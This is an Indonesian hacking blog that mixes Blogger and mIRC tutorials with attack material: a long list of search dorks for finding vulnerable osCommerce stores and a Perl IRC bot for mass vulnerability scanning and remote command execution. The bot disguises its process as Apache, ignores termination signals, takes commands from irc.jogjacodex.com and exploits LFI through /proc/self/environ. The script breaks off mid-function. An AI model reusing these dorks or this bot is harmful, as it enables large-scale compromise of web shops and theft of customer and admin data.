3.07.2012

Bugs Dork Osco 2012

.osc /catalog/classes
.osc /images/product_info.php
.osc /oscommerce/images/product_info.php
.osc /oscommerce/product_info.php
.osc "*.php?14" osc
.osc shop "My Account | Cart Contents | Checkout
.osc "by oscommerce" +web
.osc "by oscommerce" +"/shop/"
.osc "/index" "by oscommerce" +nl
.osc "/index" "by oscommerce" +ru
.osc "/admin/file_manager.php"
.osc index.php?cPath= ".com"
.osc "/asc/"+"Hard Drives"
.osc /checkout_shipping.php?osCsid=
.osc /oscommerce/catalog/ +Willkommen Gast.
.osc /oscommerce/catalog/ +Welcome Guest.
.osc index.php catalog "Powered by osCommerce"
.osc by osCommerce" /oscommerce2/catalog/
.osc /index.php?osCsid= Möchten Sie sich anmelden
.osc "specials.php?osCsid=" Get Them While They Are Hot.
.osc "Powered by osCommerce" "/osc/catalog/"
.osc "*.php?osCsid=" Powered by
.osc "*.php?osCsid=" Hacked by
.osc "*.php?cPath=" Powered by
.osc "*.php?cPath=" Hacked by
.osc "by oscommerce" Sehr verehrter Gast.
.osc "*.php?osCsid=" Sehr verehrter Gast.
.osc "*.php?cPath=" Sehr verehrter Gast.
.osc /catalog/index.php Sehr verehrter Gast.
.osc /index.php?osCsid= Herzlich Willkommen Gast.
.osc /index.php?cPath= Herzlich Willkommen Gast.
.osc /catalog/index.php Herzlich Willkommen Gast.
.osc /oscommerce/catalog/index.php Herzlich Willkommen Gast.
.osc /osco/catalog/index.php Herzlich Willkommen Gast.
.osc /catalog/index.php Herzlich Willkommen Gast.
.osc /oscommerce/catalog/index.php "Oder wollen Sie ein Kundenkonto eröffnen?"
.osc /osco/catalog "Oder wollen Sie ein Kundenkonto eröffnen?"
.osc /store "Oder wollen Sie ein Kundenkonto eröffnen?"
.osc /shop "Oder wollen Sie ein Kundenkonto eröffnen?"
.osc /catalog/index.php "Oder wollen Sie ein Kundenkonto eröffnen?"
.osc "Ecommerce Hosting by BigCommerce"
.osc /contact_us.php?osCsid=
.osc /shipping.php?osCsid=
.osc /products_new.php?osCsid=
.osc /market "My Account  |  Cart Contents  |  Checkout"
.osc /store "My Account  |  Cart Contents  |  Checkout"
.osc /shop "My Account  |  Cart Contents  |  Checkout"
.osc /catalog/shopping_cart.php
.osc /index.php?osCsid= "Darkroom"
.osc /index.php?cPath= "Darkroom"
.osc "by BigCommerce"
.osc /googlecheckout/gcheckout.php
.osc /includes/modules/order_total
.osc "/includes/functions/general.p?hp on line"
.osc Fussball Versandhandel für sportinteressierte Kunden in aller Welt
.osc oScommerce "Versandhandel für sportinteressierte Kunden in aller Welt"
.osc Möchten Sie sich anmelden +osC
.osc Möchten Sie sich anmelden +store
.osc Möchten Sie sich anmelden +shop
.osc Möchten Sie sich anmelden +osComm
.osc */catalog/product_info.php?pro?ducts_id=*
.osc ".php?cPath=" +evolution
.osc "This is a default setup of osCommerce Online Merchant." catalog
.osc /includes/configure.php. This is a potential security risk
.osc "by osCommerce" Themes by
.osc "*.php?cPath=" Merchant2/merchant
.osc "provided by osCommerce"
.osc "*.php?osCsid=" /product_info.php/products_id/
p-35.html +/katalog/
"specials.php.php" Unsere Sonderangebote: Unsere Sonderangebote.
"*.php?cPath=" Unsere Sonderangebote: Unsere Sonderangebote.
"osCommerce Online Merchant" +web
"advanced_search.php" Unsere Sonderangebote.
"create_account.php"
.osc /googlecheckout/gcheckout.php
.osc /includes/modules/order_total
.osc /osc/catalog/admin
.osc /osc/catalog
.osc /store/includes/classes
.osc "oScommerce /catalog/includes/"
.osc /includes/classes/object_info.php
.osc /includes/functions/function.php
.osc /includes/functions/database.php
.osc "Powered by oScommerce"
.osc /catalog/index.php
.osc /admin/categories.php/login.php
.osc /catalog/images
.osc "powered by oscommerce" +new product
.osc "powered by oscommerce" +catalog
.osc "/store"+"*.php?cPath=28" site:.my
.osc "powered by oscommerce" +os_commerce
.osc "powered by oscommerce" +osc2
.osc "powered by oscommerce" +osc_
.osc "powered by oscommerce" +sys
.osc creat_acount.php +13
.osc imagens_popup.php?id=
.osc "Ecommerce Hosting by BigCommerce"
.osc "by BigCommerce"
.osc /googlecheckout/gcheckout.php
.osc /includes/modules/order_total
.osc /osc/catalog/admin
.osc /osc/catalog
.osc /store/includes/classes
.osc "oScommerce /catalog/includes/"
.osc /includes/classes/object_info.php
.osc /includes/functions/function.php
.osc /includes/functions/database.php
.osc "Powered by oScommerce"
.osc /catalog/index.php
.osc /admin/categories.php/login.php
.osc /catalog/images
.osc /catalog/classes
.osc /images/product_info.php
.osc /oscommerce/images/product_info.php
.osc /oscommerce/product_info.php
.osc "os_commerce"
.osc "/includes/classes/object_info.php"
.osc "/home/images/"+"oscommerce"
.osc "*.php?cPath=55" +Product
.osc "*.php?cPath=77" +Product
.osc "*.php?cPath=20" +Product
.osc "*.php?cPath=25" +Product
.osc "Ecommerce Hosting by BigCommerce"
.osc "by BigCommerce"
.osc "powered by oscommerce" +/tienda/
.osc /osc/catalog/admin
.osc /osc/catalog
.osc /store/includes/classes
.osc "oScommerce /catalog/includes/"
.osc /includes/classes/object_info.?php
.osc /includes/functions/function.p?hp
.osc /includes/functions/database.p?hp
.osc "Powered by oScommerce"
.osc /catalog/index.php
.osc /admin/categories.php/login.ph?p
.osc /catalog/images
.osc /catalog/classes
.osc /images/product_info.php
.osc /oscommerce/images/product_inf?o.php
.osc /oscommerce/product_info.php
"osCommerce Online Merchant v2.2 RC2"
"checkout_shipping.php"
"create_account.php" Get Them While They're Hot.
==>Sak Terus'e......

2.25.2012

Download Aplikasi MIRC Handphone dan Komputer


 Nah ketemu lagi dan akhirnya ane bisa posting lagi??kali ni ane mau kasih beberapa aplikasi MIRC buat Handphone dan komputer anda.walau pun ane cuma edit punyanya para master pembuat aplikasi,tujuan ane edit aplikasi tersebut cuma pgn nampang nama...hehehe.oke langsung saja bagi yang penggila chatingan MIRC ni ada beberapa aplikasinya beserta script-scriptnya di dalamnya.

Aplikasi MIRC Handphone editan ane gan :

Aplikasi MIRC Komputer editan ane gan :

Dan yang ini ada sedikit kumpulan MIRC buat handphone anda :

 yang ini MIRC Script Buat komputer anda gan

Itu beberapa aplikasi MIRC masih ada banyak lagi di www.google.com..hehehe??terimakasih telah berkunjung di blog saya semoga bermanfaat bagi anda yang mencoba aplikasi tersebut. -_^
==>Sak Terus'e......

2.15.2012

Cara Instal Windrop

Hai para bloger mania kali ini saya mau share lagi ni tentang cara intal windrop.sebelum nya kalian masih bertanya-tanya sebenarnya windrop itu apa sih??Nah,windrop itu semacam Eggdrop mirc yang di jalankan melalu windows atau melalui koneksi kita bukan melalui shell resmi atau inject.Oke..langsung saja kita ke pokok permasalahannya saja...

1. Buatlah satu folder di komputer kamu, misalnya folder windrop
       misalnya : di directory c:
       jadinya  : C:windrop
2. download windropnya...klo belum pada punya bisa download di <a href="https://sites.google.com/site/recycleisfanblogspotcom/irc/Windrop.tar.gz">Sini</a>
3. Ekstrack lah file windrop yang sudah di download tadi di C:Windrop
4. Kemudian editlah file Conf nya , yang perlu seperti di bawah ini :
   #set nick "Easter"  <---- edit nick sendiri
   #set my-hostname "84.55.84.245" <---- ganti dengan IP Address kamu
   #set my-ip "84.55.84.245" <----- ganti sama persis kyk set my-hostname tadi
   #set basechan "#games" <----- ganti chanel kamu
  #set owner "is_fan" <--- ganti nick kamu
5. Setelah selasai edit file conf nya ,bukalah command promt/DOS , masuk ke direktori kamu tadi, misal folder windrop,dengan ketik perintah :
   C:\cd windrop
   kemudian ketik perintah untuk menjalankan windrop
   C:\windrop>eggdrop -m conf
6. Kemudian buka mIRC anda,
   setelah windrop anda online
   message windrop anda
   dengan ketik perintah
   pass <password>
   auth <password>
   ets tp ngetiknya di pv bot nya ya
7. selesai deh selamat mencoba



 

==>Sak Terus'e......

1.15.2012

Cara Menghubungkan Blog ke Account Twitter

kali ini saya akanmembahas tentang  bagaimana cara menghubungkan blog ke Twitter atau Facebook.
Nah saya langsung mulai setelah anda mendaftar ke twitter tentunya anda sudah bisa memanfaatkan twitter menambah traffic untuk blog anda. Bagi yang belum  mempunyai blog bisa mendaftarkan terlebih dahulu ke blogger.com. bagi anda yang belum mencobanya silahkan anda coba terlebih dahulu. Nggak ada ruginya sob mumpung gratis hehehehe

ini langkah untuk menghububungkan twitter dan blog
  1. Kunjungi situs twitterfeed.com terlebih dahulu
  2. Kemudian klik Register
  3. Isi form yang disediakan.
  4. Email address : Masuk kan alamat Email anda
    Password
    : Masukkan Padsword (Ingat password jangan sampai lupa)
    Confirm Password
    : Masukkan Password sekali lagi dengan Password yang sama
  5. Kemudian klik Create Account
  6. Selanjutnya klik Connect your feed to your twitter account
  7. Selanjutnya klik Username dan Password kita kemudian klik allow
  8. Setelah itu anda di suguhkan form kemudian isi form tersebut
    Feed Name
    : judul blog anda
    Rss Feed URL
    : Masukkan Rss Feed URL blog anda seperti ini
    http://namabloganda.blogspot.com/feeds/posts/default

    ganti tulisan berwarna merah dengan alamat blog anda.
  9. kemudian klik Test Rss Feed
  10. Apa bila berhasil maka akan muncul bacaan "Feed Parsed OK" dibawah Rss Feed URL
  11. Kemudian klik Create Feed Selesai 

Taraaaa Sekarang blog anda sudah terhubung dengan Twitter , untuk melihat hasilnya anda terlebih dahulu buat posting baru di blog kemudian buka account twitter anda, maka postingan blog anda akan terlihat di tweet atau update account twitter yang anda miliki.
 
==>Sak Terus'e......

Cara Membuat Read More Otomatis pada Blog anda

Kali ini saya mau share tentang pembuatan Read More otomatis mungkin di antara anda sangat kesulitan membuatnya dan masih bertanya-tanya bagaimana cara membuat read more itu dengan tulisan yang kita inginkan.Oke kita langsung ke pokok permasalahan aja cara sebenarnya sangat mudah dan gampang dan gak pakai lama sih sebenarnya (bagi kamu yang paham tentang script).pertama-tama siapakan rokok dan kopinya dlu biar gak stres waktu membuatnya heheheh...:-)
Nah yang kedua pastikan anda sudah mempunya blog dlu kl belum punya silahakan buat dlu lah...nah seterusnya ikuti panduan di bawah ini:

  1. Login dlu blog kamu
  2. masuk ke Rancangan-Edit Html
  3. jangan lupa mencentang expand widget templates
  4. cari code </head> cara yang mudah mencarinya tekan Ctrl+F  dan masukakn code </head> tersebut di Find letaknya di pokok kiri bawah browser anda…
  5. kl sudah ketemu </head> letakkan script dibawah ini dibawah persis code </head> yang tadi

<!--AUTOMATIC-READMORE-STARTS-->
<script type='text/javascript'>
var thumbnail_mode = "float" ;
summary_noimg = 250;
summary_img = 250;
img_thumb_height = 120;
img_thumb_width = 120;
</script>
<script type='text/javascript'>
//<![CDATA[
/******************************************
Widgets By BloggerBuzz

http://www.bloggerbuzz.net

********************************************/
function removeHtmlTag(strx,chop){
if(strx.indexOf("<")!=-1)
{
var s = strx.split("<");
for(var i=0;i<s.length;i++){
if(s[i].indexOf(">")!=-1){
s[i] = s[i].substring(s[i].indexOf(">")+1,s[i].length);
}
}
strx = s.join("");
}
chop = (chop < strx.length-1) ? chop : strx.length-2;
while(strx.charAt(chop-1)!=' ' && strx.indexOf(' ',chop)!=-1) chop++;
strx = strx.substring(0,chop-1);
return strx+'...';
}
function createSummaryAndThumb(pID){
var div = document.getElementById(pID);
var imgtag = "";
var img = div.getElementsByTagName("img");
var summ = summary_noimg;
if(img.length>=1) {
imgtag = '<span style="float:left; padding:0px 10px 5px  0px;"><img src="'+img[0].src+'" width="'+img_thumb_width+'px"  height="'+img_thumb_height+'px"/></span>';
summ = summary_img;
}
var summary = imgtag + '<div>' + removeHtmlTag(div.innerHTML,summ) + '</div>';
div.innerHTML = summary;
}
//]]>
</script>


  1. nah kl sudah di copy script yang di atas tadi,langkah selanjutnya cari code <data:post.body/> pastinya dengan cara mencari </head> yang tadi supaya pencarian biar cepat
  2. oke, setelah ketemu code <data:post.body/> ganti dengan code di bawah ini:

<b:if cond='data:blog.pageType != "item"'>
<div expr:id='"summary" + data:post.id'><data:post.body/></div>
<script type='text/javascript'>createSummaryAndThumb("summary<data:post.id/>");</script>
<span class='rmlink' style='float:left'><a expr:href='data:post.url'>READ MORE</a></span>
</b:if>
<b:if cond='data:blog.pageType == &quot;item&quot;'><data:post.body/></b:if>


  1. nah pembuatan read more sudah selesai klik Simpan Template

==>Sak Terus'e......

Script New Scanner RFI,LFI,E107,SQL,XML

#!/usr/bin/perl
$powered="loader";
$mail="admin(at)jogjacodex.com";
#####################################################################################
## ##
## 17/06/2010 ##
## Author : LOADER CoMMuNiTy ##
## Team : Irc.jogjacodex.com ##
## Regrets : Voo_Doo ##
## ##
## ## IMPORTANT ## ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
## # SYSTEM MORE SECURE. ##
## ## ##
## ##
## Features: ##
## [+]Sql Injection Scanner ##
## [+]e107 Scanner ##
## [+]XML (Extensible Markup Language) Injection Scanner ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]RCE r107 / LFI / XML ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Spread Mode, to activate or disable Spread Function ##
## ##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.jogjacodex.com";
my $ircport = "6667";
my $nickname = "load";
my $ident = "awaw";
my $channel = "#sampah";
my $runner = "loader";
my $fullname = 'LOADER New Scanner';
my $lfi = "!Newlfi";
my $xml = "!Newxml";
my $e107 = "!Newe107";
my $sql = "!Newsql";
my $rfi = "!Newrfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "id.jpg";
my $byroesprd = "php.jpg";
my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
chdir("/tmp");
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
&SIGN();
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
sleep 1;
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
}
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :Hello, I`m Ready To Scanner");
sendraw("PRIVMSG $runner :Hi $runner im here !!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
if ($msg=~ /PRIVMSG $channel :!help/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################## Vuln Scanner ################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # ( $rfi/$lfi/$sql/$xml ) [bug] [dork] # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################### RCE Command ################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # $e107 [dork] # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################# Execute Command ################# ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd] # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################### md5 Command ################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # !dec / !enc # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 #################### BOT Info ##################### ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 # !respon | !engine | !pid | !version | !about # ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Help 15) 10 ################################################### ");
}
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Version 15) 10 Multi Scanner v2 ");
}
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Engine 15) 10 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo. ");
}
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3PID 15) 10 Process/ID : 4 $fakeproc - $$ ");
}
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3About 15) 3 Multi Scanner v2 ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3About 15) 3 Coded by isfan ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3About 15) 3 Copyright © 2010 LOADER CoMMuNiTy ");
}
##################################################################### CMD IRC
if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
my $enc = $1;
&enc($enc);
}
if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
my $dec = $1;
&dec($dec);
}
if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
my $cnls = $1;
&join($cnls);
}
if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
my $cnls = $1;
&part($cnls);
}
if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){
my $cnls = $1;
&quit($cnls);
}
if ($msg=~ /PRIVMSG $channel :!respon/){
my $re = query($rfiid);
if ( $re =~ /LOADER/ ) {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Info 15) 3 Response is working ! ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3Info 15) 3 Response is 4NOT 3 working ! ");
}
}
##################################################################### CMD LFI
if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1."../../../../../../../../../../../../../../../proc/self/environ";
my $cmd = $2;
&cmdlfi($url,$cmd);
}
#####################################################################
##################### LFI LFI LFI ###################
##################################################################### Google Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3LFI 15) 7 Search Engine Loading ... ");
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
##################### XML XML XML ###################
#####################################################################
if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd);
}
##################################################################### GooGle Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3XML 15) 7 Search Engine Loading ... ");
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### ASK Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### UoL Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}


#####################################################################
##################### RFI RFI RFI ###################
##################################################################### GooGle Engine


if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 10 Dork : 4 $d0rk ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 10 File : 4 $bugx ");
sendraw($IRC_cur_socket, "PRIVMSG $channel : 15( 4@ 3RFI 15) 7 Search Engine Loading ... ");
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Bing Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}


##################################################################### Altavista Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
